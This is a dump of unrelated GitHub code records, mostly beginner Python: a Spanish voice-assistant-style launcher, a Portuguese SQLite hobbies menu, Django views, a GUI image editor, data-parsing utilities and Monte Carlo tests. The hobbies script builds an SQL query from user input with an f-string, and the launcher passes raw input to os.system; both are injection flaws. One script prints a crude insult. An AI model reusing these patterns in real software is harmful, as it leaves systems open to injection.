\")\r\n\tpeticion = peticion.lower()\r\n\tif peticion.find(\"juegos\") != -1 or peticion.find(\"jugar\") != -1:\r\n\t\tjuegos()\r\n\tif peticion.find(\"programar\") != -1 or peticion.find(\"trabajar\") != -1 or peticion.find(\"python\") != -1 or peticion.find(\"trabajo\") != -1:\r\n\t\ttrabajar()\r\n\tif peticion.find(\"idea\") != -1 or peticion.find(\"ideas\") != -1:\r\n\t\tideas()\r\n\tif peticion.find(\"dioso\") != -1 or peticion.find(\"exit\") != -1 or peticion.find(\"salir\") != -1:\r\n\t\tprint(\"Diosoooo bb\")\r\n\t\texit()\r\n\r\ndef juegos():\r\n\tgame = input(\"¿Que juego quieres jugar? \")\r\n\tgame = game.lower()\r\n\tif game.find(\"overwatch\") != -1:\r\n\t\tos.system(r\"C:\\Users\\borru\\Desktop\\Gertravis\\Juegos\\Overwatch.lnk\")\r\n\telif game.find(\"steam\") != -1:\r\n\t\tprint(\"comprate el disco de el juego en fisico k no lo puedo abrir XD \")\r\n\telif game.find(\"csgo\") != -1 or game.find(\"counter\") != -1:\r\n\t\tprint(\"comprate el disco de el juego en fisico k no lo puedo abrir XD \")\r\n\telif game.find(\"pubg\") != -1 or game.find(\"player\") != -1:\r\n\t\tprint(\"comprate el disco de el juego en fisico k no lo puedo abrir XD \")\r\n\telif game.find(\"sniper\") != -1 or game.find(\"ghost\") != -1 or game.find(\"warrior\") != -1:\r\n\t\tprint(\"comprate el disco de el juego en fisico k no lo puedo abrir XD \")\r\n\telse:\r\n\t\tprint(\"No he encontrado el juego en la base de datos, compratelo puto pobre de mierda PD: Fake bitch\")\r\n\r\n#Carala guapa.\r\ndef trabajar():\r\n\twork = input(\"¿Que quieres abrir? \")\r\n\twork = work.lower()\r\n\tif work.find(\"sublime\") != -1:\r\n\t\tos.system(\"sublime_text\")\r\n\r\n\tif work.find(\"google\") != -1 or work.find(\"chrome\") != -1:\r\n\t\tgo = input(\"¿Quieres entrar en alguna pagina en concreto? \")\r\n\t\tif go == \"si\" or go == \"s\" :\r\n\t\t\tww = input(\"¿Cual?: \")\r\n\t\t\tos.system(\"start chrome.exe \" + ww + \".com\")\r\n\t\telse:\r\n\t\t\tos.system(\"start chrome.exe www.google.com\")\r\n\r\ndef ideas():\r\n\tnideas = 0\r\n\tidea = input(\"Tienes una idea \")\r\n\tif idea != \"si\":\r\n\t\tdb = open(\"db.txt\", \"r\")\r\n\t\tprint(\"Estas son tus ideas: \")\r\n\t\tfor i in db:\r\n\t\t\t#numero de ideasssssssss\r\n\t\t\tnideas += 1\r\n\t\tdb.close()\r\n\t\tdb = open(\"db.txt\", \"r\")\r\n\r\n\t\tide = db.readlines()\r\n\t\tfor i in range(0,nideas):\r\n\t\t\tprint(ide[i])\r\n\r\n\telse:\r\n\t\tdb = open(\"db.txt\", \"a\")\r\n\t\tcarla = input(\"¿Cual es tu idea amorr? \")\r\n\t\tprint(\"Excelente idea guapo, la guardare en el fondo de mi corazon(en db.txt)\")\r\n\t\tdb.write(carla + \"\\n\")\t\r\nwhile True:\r\n\tprint(menu)\r\n\tsistema()\t","repo_name":"XaviBorrueco/GerTravis","sub_path":"ger.py","file_name":"ger.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34263242104","text":"import sqlite3\nimport emoji\nimport time\n\n\nconexao = sqlite3.connect('exercicio.db')\ncursor = conexao.cursor()\n\ndef insert_hobbies():\n cursor = conexao.cursor()\n selecao = cursor.execute('SELECT ID, NOME FROM PESSOAS')\n for selecione in selecao: \n print(f'ID: {selecione[0]} | NOME: {selecione[1]} ')\n \n pessoa_id = int(input('ESCOLHA O ID PARA ADICIONAR UM HOBBIE: '))\n hobbie = input(f'DESCREVA O HOBBIE DA PESSOA {pessoa_id}: ')\n sql = 'INSERT INTO HOBBIES (PESSOA_ID , HOBBY) VALUES (?, ?)'\n valor = [pessoa_id , hobbie]\n print('Dados inseridos com sucesso ! 
')\n\n cursor.execute(sql, valor)\n conexao.commit()\n\n retornar_menu()\n\ndef pessoas_e_hobbies():\n cursor = conexao.cursor()\n print('LISTA DE PESSOAS E SEUS HOBBIES')\n sql = '''SELECT P.NOME, H.HOBBY \n FROM PESSOAS AS P \n INNER JOIN HOBBIES AS H ON P.ID = H.PESSOA_ID'''\n\n cursor.execute(sql)\n\n resultado = cursor.fetchall()\n\n for linha in resultado:\n nome_da_pessoa, hobby = linha\n print(f'Nome: {nome_da_pessoa} | Hobby: {hobby}')\n\n conexao.commit()\n \n retornar_menu()\n\ndef hobby_especifico():\n cursor = conexao.cursor()\n hobby_especifico = input('HOBBY: ')\n sql = '''SELECT P.NOME AS NomeDaPessoa\n FROM PESSOAS AS P \n INNER JOIN Hobbies AS H ON P.ID = H.PESSOA_ID\n WHERE H.Hobby = ? ;'''\n\n cursor.execute(sql, (hobby_especifico,))\n resultado = cursor.fetchall()\n\n print(f'Pessoas que possuem o hobbie de {hobby_especifico} ')\n for linha in resultado:\n nome_da_pessoa= linha[0]\n print(f'Nome: {nome_da_pessoa} ' )\n\n conexao.commit()\n \n retornar_menu()\n\ndef hobbies_em_comum():\n cursor = conexao.cursor()\n resultado = cursor.execute('SELECT NOME FROM PESSOAS')\n for result in resultado:\n print(f' NOME {result[0]}')\n \n nome = input('DIGITE O NOME DESEJADO: ')\n sql = f''' SELECT DISTINCT P.NOME FROM PESSOAS AS P INNER JOIN HOBBIES H\n ON P.ID = H.PESSOA_ID WHERE H.HOBBY IN \n (SELECT HOBBY FROM HOBBIES H \n INNER JOIN PESSOAS P ON P.ID= H.PESSOA_ID WHERE P.NOME = '{nome}')\n '''\n\n pessoas_hobbies_em_comum = cursor.execute(sql)\n print(F'PESSOAS COM HOBBIES EM COMUM COM {nome} ')\n\n for phc in pessoas_hobbies_em_comum:\n print(f'NOME: {phc[0]} ')\n \n conexao.commit()\n \n retornar_menu()\n\ndef retornar_menu():\n opcao = int(input('''Deseja retornar ao menu ? \n [1] Sim \n [2] Não \n Escolha um número: '''))\n\n \n if opcao == 1:\n menu()\n elif opcao == 2:\n sair()\n else: \n print('Opção inválida \\n')\n retornar_menu()\n\ndef sair():\n print('Saindo do programa em ')\n print('3')\n time.sleep(1)\n print('2')\n time.sleep(1)\n print('1')\n time.sleep(1)\n print(emoji.emojize('Até a próxima ! :waving_hand: ', language='en'))\n\n\ndef menu():\n opcao= int(input('''\n \"ESCOLHA UMA DAS OPÇÕES:\n [1] INSERIR HOBBY\n [2] LISTAR PESSOAS E HOBBIES\n [3] HOBBY ESPECÍFICO\n [4] PESSOAS COM HOBBY EM COMUM\n [0] SAIR\n \n QUAL OPÇÃO VOCÊ DESEJA? 
: ''' ))\n\n \n if opcao == 1:\n insert_hobbies()\n\n elif opcao == 2: \n pessoas_e_hobbies()\n\n elif opcao == 3:\n hobby_especifico()\n\n elif opcao == 4:\n hobbies_em_comum()\n\n elif opcao == 0:\n sair()\n\n else: \n print('Opção inválida \\n')\n menu()\n\n\nmenu()\n","repo_name":"Nandabdev/ConsultasSQL.py","sub_path":"hobbies.py","file_name":"hobbies.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"39351406695","text":"from django.db.models import Avg\nfrom django.shortcuts import render, get_object_or_404\n\nfrom .models import Book\n\n\n# Create your views here.\n\ndef index(request):\n books = Book.objects.all().order_by(\"title\")\n total_books = books.all().count()\n average_rating = books.aggregate(Avg(\"rating\"))\n return render(request, \"book_outlet/index.html\", {\n \"books\": books,\n \"total_books\": total_books,\n \"average_rating\": average_rating\n })\n\n\ndef book_details(request, slug):\n book = get_object_or_404(Book, slug=slug)\n return render(request, \"book_outlet/book_details.html\", {\n \"book\": book\n })\n","repo_name":"nikhilbadyal/django-book-store","sub_path":"book_outlet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37039981230","text":"import PySimpleGUI as sg\nimport io\nimport base64\nfrom PIL import Image\nfrom tkinter import PhotoImage\nfrom time import time\n\ndef convert(image):\n # image = Image(image)\n with io.BytesIO() as output:\n image.save(output, format='png')\n b = output.getvalue()\n base64_img = base64.b64encode(b)\n return base64_img\n # image = PhotoImage(image)\n\nlayout = []\nlayout.append(\n [sg.Text('Ahoj PySimpleGUI', key='welcome_text')]\n)\nlayout.append(\n [sg.Graph(\n canvas_size=(400, 400),\n graph_bottom_left=(0, 0),\n graph_top_right=(400, 400),\n background_color='white',\n enable_events= True,\n drag_submits= True,\n key='graph'\n ),\n sg.Button('RELOAD', key='reload', size=(10, 2), pad=((0, 0), (350, 0))),\n sg.Button('ERASE', tooltip='Cancell this action', size=(10, 2), pad=((5, 0), (350, 0)))\n ]\n)\nlayout.append(\n [sg.InputText('image_path', size=(100, 0), key='path_text_box'),\n sg.FileBrowse('Open Image', file_types=(('Images',('*.jpg', '*.png')),), enable_events=True, key='load_img')\n ]\n)\nlayout.append([sg.OK(f'{x}') for x in range(10)])\n\ntry:\n window = sg.Window(title='AI E-DIT', layout=layout, margins=(100, 50))\n # window.finalize()\n images = []\n # graph = window['graph']\n graph = window.FindElement('graph')\n while True:\n event, values = window.read(timeout=100)\n w_text = window.FindElement('welcome_text')\n w_text.update(f'{time()}')\n # print(event, values)\n if event is not None:\n print(f'Event: {event}\\nValues: {values}')\n if event == sg.WINDOW_CLOSED:\n break\n elif event == 'load_img':\n f_url = values.get('load_img')\n print('here')\n if len(f_url) > 0:\n image = Image.open(f_url)\n image = image.resize((400, 400))\n images= [image]\n base64_img = convert(image)\n graph.draw_image(data=base64_img, location=(0, 400))\n path_text_box = window.FindElement('path_text_box')\n path_text_box.Update(f_url)\n print(path_text_box.Update)\n print('Image loaded')\n elif event == 'reload':\n f_url = values.get('load_img')\n if len(f_url) > 0:\n image = Image.open(f_url)\n image = image.resize((400, 400))\n images = [image]\n base64_img = convert(image)\n 
graph.draw_image(data=base64_img, location=(0, 400))\n\n elif event == 'ERASE':\n print('KUA')\n graph.Erase()\n elif event == 'graph': #or (event == 'graph+UP'):\n # print(dir(images[0]))\n # print(help(images[0].putpixel))\n x,y = values.get('graph')\n images[0].putpixel((x, -y), (0, 0, 0))\n base64_img = convert(images[0])\n print(dir(graph))\n exit()\n graph.draw_image(data=base64_img, location=(0, 400))\n print('prid')\nexcept Exception as e:\n pass\nfinally:\n window.close()","repo_name":"sliscak/random-ideas","sub_path":"proj10/gui2.py","file_name":"gui2.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"1436542725","text":"import re\nimport pandas as pd\nfrom dateutil.parser import parse\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler, LabelEncoder, OneHotEncoder, OrdinalEncoder\nfrom sklearn.compose import make_column_transformer\n\nclass Parsing ():\n\n def __init__(self,user_input_dict) -> None:\n self.user_input_dict = user_input_dict\n pass\n\n def get_user_input(self):\n\n ''' Get the dictionary from the app with the options from the user. \n Separate the columns that we should keep, the columns to parse by type, \n and the columns that should be scaled.'''\n\n cols_dict = {}\n cols_transf = {}\n cols_type = {}\n \n for name, item in self.user_input_dict.items():\n #Test if the user wants to keep the column.\n if item[0]:\n\n #Separate the colums between diferent scales\n if item[2] not in cols_transf: \n cols_transf[item[2]] = []\n cols_transf[item[2]].append(name)\n\n #Separate the colums between diferent types \n if item[1] not in cols_type:\n cols_type[item[1]] = [] \n cols_type[item[1]].append(name)\n\n #Generate the dictionary with type and scale together\n cols_dict['transform'] = cols_transf\n cols_dict['type'] = cols_type\n cols_dict \n return cols_dict\n\n\n\n def parse_data(self,df):\n '''Parse the columns by type, transform integers, date, \n and integers into actual data type by regex pattern.'''\n\n #Select dictionary type\n user_dict = self.get_user_input()\n user_type_transf = user_dict['type']\n \n #Regex patterns\n int_pattern = re.compile('\\d*')\n float_pattern = re.compile('\\d*[.]\\d*')\n df_error = pd.DataFrame()\n df_parsed = pd.DataFrame()\n\n #Iterate over the types in the dictionary \n\n for key_name in user_type_transf: \n\n #Test if the type is an integer\n if 'int' in key_name:\n for column_name in user_type_transf['int']:\n try:\n int_column = []\n for row in df[column_name].iteritems():\n matches = re.findall(int_pattern, str(row[1]))\n m = \"\".join(matches).strip()\n #If it is an integer, it tries to convert each row on the DataFrame to an actual integer. \n #If it fails, it will attribute 0 to the row.\n try:\n int_column.append(int(m))\n except:\n int_column.append(0)\n df_parsed[column_name] = int_column\n except:\n df_error[column_name] = df[column_name]\n\n #Test if the type is an float\n elif 'float' in key_name:\n try:\n for column_name in user_type_transf['float']:\n float_column = []\n for row in df[column_name].iteritems():\n matches = re.findall(float_pattern, str(row[1]))\n m = \"\".join(matches).strip()\n #If it is an float, it tries to convert each row on the DataFrame to an actual float. 
\n #If it fails, it will attribute 0 to the row.\n try:\n float_column.append(float(m))\n except:\n float_column.append(0)\n df_parsed[column_name] = float_column\n except:\n df_error[column_name] = df[column_name]\n\n #Test if the type is a date\n elif 'date' in key_name:\n try:\n for column_name in user_type_transf['date']:\n date_column = []\n for row in df[column_name].iteritems():\n str(row[1])\n m = parse(str(row[1]))\n date_column.append(m)\n df_parsed[column_name] = date_column\n except:\n df_error[column_name] = df[column_name]\n #For the other types like text and categorical binary \n # the columns continues the same\n else:\n for column_name in user_type_transf[key_name]:\n date_column = []\n df_parsed[column_name] = df[column_name] \n return df_parsed,df_error\n\n\n def scaler_encoder(self,df):\n user_dict = self.get_user_input()\n user_type_scale = user_dict['transform']\n scaler_list = []\n col_name_list = []\n for scaler, cols in user_type_scale.items():\n if scaler == 'StandardScaler':\n scaler_list.append((StandardScaler(),cols))\n elif scaler == 'MinMaxScaler':\n scaler_list.append((MinMaxScaler(),cols))\n elif scaler == 'RobustScaler':\n scaler_list.append((RobustScaler(),cols))\n elif scaler == 'OneHotEncoder':\n scaler_list.append((OneHotEncoder(handle_unknown='ignore', sparse=False),cols))\n elif scaler == 'OrdinalEncoder':\n scaler_list.append((OrdinalEncoder(),cols))\n\n [col_name_list.extend(col_name[1]) for col_name in scaler_list]\n for col_name in df.columns:\n if col_name not in col_name_list:\n col_name_list.append(col_name)\n print(col_name_list)\n preprocessor = make_column_transformer(*scaler_list, remainder='passthrough')\n preprocessor.fit(df)\n if 'OneHotEncoder' in user_type_scale:\n transf_columns_names = preprocessor.get_feature_names_out()\n transf_names_list = [\n col_name.rpartition('__')[2] for col_name in transf_columns_names]\n df_transformed_pre = preprocessor.transform(df)\n df_transformed = pd.DataFrame(df_transformed_pre, columns=transf_names_list)\n else:\n df_transformed_pre = preprocessor.transform(df)\n df_transformed = pd.DataFrame(df_transformed_pre,columns=col_name_list)\n return df_transformed\n\n def parse_and_transform(self,df):\n df_parsed,df_error = self.parse_data(df)\n print(df_parsed)\n df_trasnf = self.scaler_encoder(df_parsed)\n if df_error.empty:\n return df_trasnf,'Done'\n print(df_error)\n return pd.concat([df_trasnf, df_error], axis=1), f'Parse error in columns {df_error.columns}' \n\nif __name__ == '__main__':\n predictions = {'int_test':(True, 'int','MinMaxScaler'),\n 'date':(True, 'date',None),\n 'int_num':(True, 'int','RobustScaler'),\n 'float_num':(True, 'float','StandardScaler'),\n 'int_num_str':(True, 'int','StandardScaler'),\n 'float_num_str':(True, 'float','MinMaxScaler'),\n 'bin_cat' :(True, 'cat-bin','OrdinalEncoder'),\n 'bin_cat_str' :(True, 'cat-bin','OrdinalEncoder'),\n 'multi_cat_str' :(True, 'text',None),\n }\n int_test=['126 mins', '134 mins', '253_mins', '123,000', '53 seconds']\n date =['12/08/2012', '12 Aug 2022', '12/08/22','20-08-12','12-08-2021']\n int_num =[1,2000,346980,481464,654654]\n float_num =[13654.543,3546645.454,54654654.88,64655432.54654,6544453213.654521]\n int_num_str =['1','2000','b','481464654654','64654']\n float_num_str =['13654.543','asd','54654654.88','64655432.54654','6544453213.654521']\n bin_cat =[True,False,False,True,True]\n bin_cat_str =['Yes','No','No','Yes','Yes']\n multi_cat_str =['gdgd','adsdas','dfsfdfsdf','Ysfdfss','Yesdafbhdfgs']\n\n df = pd.DataFrame({'int_test': 
int_test,\n 'date': date,\n 'int_num':int_num,\n 'float_num':float_num,\n 'int_num_str': int_num_str,\n 'float_num_str':float_num_str,\n 'bin_cat' : bin_cat,\n 'bin_cat_str' : bin_cat_str,\n 'multi_cat_str':multi_cat_str})\n parse_type = Parsing(predictions)\n print(parse_type.parse_and_transform(df))","repo_name":"eloisahernandez/classipy-webapp","sub_path":"classipyapp/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"42564969460","text":"from Traversals import bfs_path\nimport heapq\nfrom collections import deque\nfrom Simulator import Simulator\nimport sys\n\nclass Solution:\n\n def __init__(self, problem, isp, graph, info):\n self.problem = problem\n self.isp = isp\n self.graph = graph\n self.info = info\n\n def output_paths(self):\n \"\"\"\n This method must be filled in by you. You may add other methods and subclasses as you see fit,\n but they must remain within the Solution class.\n \"\"\"\n paths, bandwidths, priorities = {}, {}, {}\n\n \n map = []\n bandwidths = self.info[\"bandwidths\"]\n alphas = self.info[\"alphas\"]\n for vertex in self.graph:\n if vertex in bandwidths and vertex in alphas:\n map.append((vertex, bandwidths[vertex], alphas[vertex], self.graph[vertex]))\n\n\n #map is a sorted list of (node, bandwidth of node, alpha)\n #print(map)\n\n distance = {}\n distance[self.isp] = 0\n for i in self.graph:\n distance[i] = 999999999999999999999999999999999\n queue=[]\n queue.append((self.isp,0))\n\n explored= []\n explored.append(self.isp)\n\n sorted_map = sorted(map, key=lambda x: x[1])\n\n while(len(queue)!= 0):\n node, dis = heapq.heappop(queue)\n if(node not in explored):\n explored.append(node)\n \n for next_node, weight, apl, edge_list in map:\n D = distance[node] + weight\n if(D<=apl):\n if (D < distance[next_node]):\n distance[next_node] = D\n heapq.heappush(queue, (next_node, D))\n paths[node]=next_node\n\n\n\n return (paths, bandwidths, priorities)\n","repo_name":"19clehr/cse331_project_take2","sub_path":"Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73464870322","text":"from setuptools import setup, find_packages\n\n# requerments.txt path\nreq_file = 'requirements.txt'\nwith open(req_file) as f:\n requirements = f.read().splitlines()\n\nreadme_file = 'README.md'\nwith open(readme_file) as f:\n readme = f.read()\n\nchanges_log_file = 'CHANGELOG.md'\nwith open(changes_log_file) as f:\n changes_log = f.read()\n\nrecent_changes_file = 'RECENTCHANGELOG.md'\nwith open(recent_changes_file) as f:\n recent_changes = f.read()\n\nlong_description = readme + '\\n\\n' +\"# RECENT CHANGES\\n\" + recent_changes + '\\n\\n' + changes_log\n\nclassifiers = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n]\n\nsetup(\n name='wattpad-scraper',\n version='0.0.40',\n description='Get wattpad stories and chapters, and download them as ebook',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/shhossain/wattpad-scraper',\n author='Shafayat Hossain Shifat',\n 
author_email='hossain0338@gmail.com',\n license='MIT',\n classifiers=classifiers,\n packages=find_packages(),\n install_requires=requirements,\n)","repo_name":"Ayobamidele/wattpad-scraper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31026176733","text":"from skimage import feature\nimport numpy\nfrom GLCM.pixel_matrix import CoOcurrencyMatrix\nfrom helper_functions import write_text_files\nfrom PCA.pca_interpretation import PCAComponentsInterpretation\n\nclass TextureMeasurements():\n\t\"\"\"\n\tThey are Energy, Entropy, Contrast, Correlation, and Homogeneity. Energy\n\treturns the sum of squared elements in the GLCM and the range will be in\n\t[0, 1]. Entropy measures the randomness of intensity distribution.\n\tCorrelation measure of image linearity, and Homogeneity Returns a value that\n\tmeasures the closeness of the distribution of elements in the GLCM to the GLCM\n\tdiagonal and range will be in [0 1].\n\t\"\"\"\n\tdef save_texture_measurements(self, image_number, image_file_location):\n\t\t\"\"\"\n\t\tFrom the GLCM matrix, create an array with the calculations of the texture\n\t\tmeasurements (contrast, energy, dissimilarity, homogeneity, correlation, asm)\n\t\tand save them in a text file.\n\t\tContrast: Measures the amount of local variation in the image.\n\n\t\tArgs:\n\t\t\timage_number (number): A number that identifies the image to be analyzed\n\t\t\timage_file_location (string): The location where the image is stored\n\n\t\tReturns:\n\t\t\t(string): The location of where the contrast information \n\t\t\t\t\t of the matrix will be saved\n\t\t\"\"\"\n\t\tglcm_percentage_matrix = CoOcurrencyMatrix().relationship_probabilities(image_file_location)\n\n\t\tcontrast = self.extract_texture_measurement(glcm_percentage_matrix, texture='contrast')\n\t\tenergy = self.extract_texture_measurement(glcm_percentage_matrix, texture='energy')\n\t\tdissimilarity = self.extract_texture_measurement(glcm_percentage_matrix, texture='dissimilarity')\n\t\thomogeneity = self.extract_texture_measurement(glcm_percentage_matrix, texture='homogeneity')\n\t\tcorrelation = self.extract_texture_measurement(glcm_percentage_matrix, texture='correlation')\n\t\tasm = self.extract_texture_measurement(glcm_percentage_matrix, texture='ASM')\n\n\t\ttextures = numpy.concatenate((contrast,energy,dissimilarity,homogeneity,correlation,asm),axis=0)\n\t\ttextures = numpy.insert(arr=textures,obj=0,values=image_number)\n\n\t\twrite_text_files(link_to_file=\"GLCM/matrix/textures_mdb{}.txt\".format(image_number), result_data=textures)\n\n\t\treturn \"GLCM/matrix/textures_mdb{}.txt\".format(image_number)\n\n\tdef extract_texture_measurement(self, glcm_percentage_matrix, texture):\n\t\t\"\"\"\n\t\tExtract the texture measurements of the image from the four glcm percentage\n\t\tmatrix vertical and horizontal direction.\n\t\t\n\t\tArgs:\n\t\t\tglcm_percentage_matrix (array): The percentage of the relationship between\n\t\t\t\t\t\t\t\t\t\t\ttwo pixels in the image\n\t\t\ttexture (string): The texture property to be calculated from the GLCM matrix\n\n\t\tReturns:\n\t\t\textracted_texture (array): The texture measurements of the GLCM with\n\t\t\t\t\t\t\t \t\t vertical and horizontal direction.\n\t\t\"\"\"\n\t\textracted_texture = feature.greycoprops(glcm_percentage_matrix, prop=texture).flatten()\n\n\t\treturn 
extracted_texture\t","repo_name":"khatabi-abderrahim/breast_cancer_detection","sub_path":"GLCM/textures_measurements.py","file_name":"textures_measurements.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21620201830","text":"import numpy as np\n\n\ndef function_to_integrate(x, y):\n return np.exp(-x**2 - y**2)\n\n\ndef polar_MC(polar):\n size = 100000\n integral = 0.\n integration_radius = 4.\n if polar:\n for _ in range(size):\n r = np.random.random()*integration_radius\n phi = np.random.random()*2.*np.pi\n x = r*np.cos(phi)\n y = r*np.sin(phi)\n integral += function_to_integrate(x, y) * r\n integral = integral * 2.*np.pi * integration_radius / size\n else:\n for _ in range(size):\n length = 2. * integration_radius\n x = np.random.random()*length - length/2.\n y = np.random.random()*length - length/2.\n integral += function_to_integrate(x, y)\n integral = integral * length**2 / size\n print('POLAR: True integral should be pi ', '; MC:', integral, polar)\n\n\ndef log_MC(log):\n size = 100000\n integral = 0.\n if log:\n for _ in range(size):\n x = np.random.uniform(-2, 7.)\n jacobian_MC_log = (10**x * np.log(10))*9.\n integral += 10**x * jacobian_MC_log\n # x = np.random.uniform(np.log(10**-2), np.log(10**7.))\n # integral += np.e**x\n # (np.log(10**7) - np.log(10**-2))\n integral = integral / size\n\n else:\n for _ in range(size):\n x = np.random.uniform(10**-2, 10**7)\n integral += x\n integral = integral*10**7 / size\n\n print('LOG: True integral should be 0.5*10**7*10**7 = 5*10**13; MC:', integral/10**13, '* 10**13', log)\n\n\ndef both_combined_the_Mareks_way():\n no_of_samples = 100000\n steps_in_integrand_theta = 20\n integral = 0.\n\n shift = 2. * np.pi / steps_in_integrand_theta / 2. # to avoid double counting and y-axis with z and w.\n integrand_angles = np.linspace(-np.pi + shift, np.pi - shift, steps_in_integrand_theta)\n integrand_radii = np.logspace(-5., 1., 20000)\n integrand_cartesian_coods = np.zeros((len(integrand_angles) * len(integrand_radii), 2))\n for radius_ind in range(len(integrand_radii)):\n for theta_ind in range(len(integrand_angles)):\n x_cood = integrand_radii[radius_ind] * np.cos(integrand_angles[theta_ind])\n y_cood = integrand_radii[radius_ind] * np.sin(integrand_angles[theta_ind])\n integrand_cartesian_coods[radius_ind * len(integrand_angles) + theta_ind][0] = x_cood\n integrand_cartesian_coods[radius_ind * len(integrand_angles) + theta_ind][1] = y_cood\n\n random_indexes_z = np.random.randint(0, len(integrand_cartesian_coods), no_of_samples) # z\n array_of_z = integrand_cartesian_coods[random_indexes_z]\n for integration_point in array_of_z:\n x = integration_point[0]\n y = integration_point[1]\n jacobian = np.linalg.norm(integration_point) * np.log(10.) * np.linalg.norm(integration_point) # One r for polar integration and ln(10)*r for log\n integral += function_to_integrate(x, y)*jacobian\n probability_normalization_polar = 2. * np.pi\n probability_normalization_log = np.log10(integrand_radii[-1]) - np.log10(integrand_radii[0])\n print(probability_normalization_log, probability_normalization_polar)\n integral = integral * probability_normalization_polar * probability_normalization_log / no_of_samples\n print('True integral should be pi; MC:', integral)\n\n\ndef both_combined_the_Mareks_way_2D():\n no_of_samples = 1000000\n steps_in_integrand_theta = 20\n integral = 0.\n\n shift = 2. * np.pi / steps_in_integrand_theta / 2. 
# to avoid double counting and y-axis with z and w.\n integrand_angles = np.linspace(-np.pi + shift, np.pi - shift, steps_in_integrand_theta)\n integrand_radii = np.logspace(-7., 2., 20000)\n integrand_cartesian_coods = np.zeros((len(integrand_angles) * len(integrand_radii), 2))\n for radius_ind in range(len(integrand_radii)):\n for theta_ind in range(len(integrand_angles)):\n x_cood = integrand_radii[radius_ind] * np.cos(integrand_angles[theta_ind])\n y_cood = integrand_radii[radius_ind] * np.sin(integrand_angles[theta_ind])\n integrand_cartesian_coods[radius_ind * len(integrand_angles) + theta_ind][0] = x_cood\n integrand_cartesian_coods[radius_ind * len(integrand_angles) + theta_ind][1] = y_cood\n\n random_indexes_z = np.random.randint(0, len(integrand_cartesian_coods), no_of_samples) # z\n random_indexes_w = np.random.randint(0, len(integrand_cartesian_coods), no_of_samples) # z\n array_of_z = integrand_cartesian_coods[random_indexes_z]\n array_of_w = integrand_cartesian_coods[random_indexes_w]\n # THE FUNCTION IS A UNIT FUNCTION\n function_to_integrate = 1.\n for integration_idx in range(no_of_samples):\n integration_point_z = array_of_z[integration_idx]\n integration_point_w = array_of_w[integration_idx]\n jacobian_z = np.linalg.norm(integration_point_z) * np.log(10.) * np.linalg.norm(integration_point_z) # One r for polar integration and ln(10)*r for log\n jacobian_w = np.linalg.norm(integration_point_w) * np.log(10.) * np.linalg.norm(integration_point_w) # One r for polar integration and ln(10)*r for log\n integral += function_to_integrate*jacobian_z*jacobian_w\n probability_normalization_polar = 2. * np.pi\n probability_normalization_log = np.log10(integrand_radii[-1]) - np.log10(integrand_radii[0])\n probability_normalization = probability_normalization_polar * probability_normalization_log\n\n integral = integral * probability_normalization**2 / no_of_samples\n print('True integral should be pi*10000**2 = 98696; MC:', integral/986960000.)\n\n\n# polar_MC(polar=True)\n# polar_MC(polar=False)\n#\n# log_MC(log=True)\n# log_MC(log=False)\n\n# both_combined_the_Mareks_way()\nboth_combined_the_Mareks_way_2D()\n\n\n\n\n","repo_name":"MatasMarek/NLO_BK","sub_path":"tests/monte_carlo_nonuniform_sampling.py","file_name":"monte_carlo_nonuniform_sampling.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72056433206","text":"from collections import deque\n\nm, n = map(int, input().split())\narr = [list(map(int, list(input()))) for _ in range(n)]\nvisited = [[False]*m for _ in range(n)]\ndx, dy = [-1, 0, 1, 0], [0, 1, 0, -1]\n\nq = deque()\nq.append((0, 0, 0))\nvisited[0][0] = True\n\nwhile q:\n x, y, c = q.popleft()\n \n if x == n-1 and y == m-1:\n answer = c\n break\n\n for d in range(4):\n nx, ny = x + dx[d], y + dy[d]\n \n if 0 <= nx < n and 0 <= ny < m and visited[nx][ny] == False:\n visited[nx][ny] = True\n if arr[nx][ny] == 0:\n q.appendleft((nx, ny, c))\n else:\n q.append((nx, ny, c+1))\n \nprint(answer)","repo_name":"Algorithm-Study/Algorithm","sub_path":"graph/B1261_이성우.py","file_name":"B1261_이성우.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"15176599983","text":"# coding: utf8\n# Паника мячей\n# Игрок должен ловить мячи\nfrom livewires import games, color\nimport random\ngames.init(screen_width = 640, screen_height = 480, fps = 50)\n\nclass 
